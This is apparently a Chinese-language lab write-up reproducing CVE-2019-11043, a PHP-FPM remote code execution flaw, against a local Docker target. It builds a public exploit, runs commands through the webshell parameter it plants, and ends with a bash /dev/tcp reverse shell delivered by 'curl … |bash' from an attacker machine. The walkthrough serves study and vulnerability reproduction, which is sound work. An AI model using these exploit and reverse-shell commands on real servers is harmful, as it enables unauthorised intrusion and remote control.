CVE-2019-11043 PHP远程代码执行复现

前言

  环境搭建地址

环境搭建

cd /php/CVE-2019-11043
docker-compose up -d

  docker ps有两个容器
  
  再访问8080端口下的index.php,出现hello world环境搭建成功
  

漏洞利用

  exp需要go环境,使用以下命令安装go环境,这里是kali演示

# 安装go环境
apt install golang -y
go env -w GOPROXY=https://goproxy.cn # 代理地址换成国内
# 下载exp
git clone https://hub.fastgit.org/neex/phuip-fpizdam.git
cd phuip-fpizdam/
go get -v && go build  # 编译

  编译成功后,会多一个phuip-fpizdam
  
  执行go run . http://127.0.0.1:8080/index.php,如下图表示执行成功
  
  进入docker执行cat /tmp/a,exp创建了一个简单的一句话传参命令
  
  访问http://127.0.0.1:8080/index.php?a=whoami,多访问几遍即可成功执行命令
  

getshell

  这里访问http://127.0.0.1:8080/index.php?a=bash -i >& /dev/tcp/192.168.127.132/4444 0>&1,kali使用nc开启监听是不能反弹shell的。
  正确的做法先输入nc -lvp 4444,开启监听后
  
  另外开一个终端输入以下命令

echo "bash -i >& /dev/tcp/192.168.127.132/4444 0>&1" > shell
python -m SimpleHTTPServer 8000

  
  访问http://127.0.0.1:8080/index.php?a=curl 192.168.127.132:8000/shell |bash,成功反弹shell
  

查看评论 -
评论